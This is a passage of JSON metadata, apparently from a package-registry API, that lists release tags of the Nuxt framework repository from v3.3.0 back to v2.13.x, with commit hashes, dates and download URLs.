3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072